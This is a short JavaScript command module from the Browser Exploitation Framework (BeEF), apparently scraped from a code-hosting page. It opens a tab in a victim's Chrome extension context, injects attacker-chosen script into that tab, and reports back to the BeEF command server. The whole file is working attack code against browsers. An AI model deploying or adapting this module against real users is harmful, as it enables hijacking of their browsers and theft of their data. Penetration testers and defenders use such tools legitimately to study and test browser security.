19 lines
601 B
JavaScript
19 lines
601 B
JavaScript
//
|
|
// Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - https://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
beef.execute(function() {
|
|
try{
|
|
chrome.tabs.create({url:"<%= @url %>"}, function(tab){
|
|
chrome.tabs.executeScript(tab.id,{code:"<%= @theJS %>"}, function(){
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Code executed on tab.id: ' + tab.id);
|
|
});
|
|
});
|
|
} catch(error){
|
|
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Not inside of a Chrome Extension');
|
|
}
|
|
});
|
|
|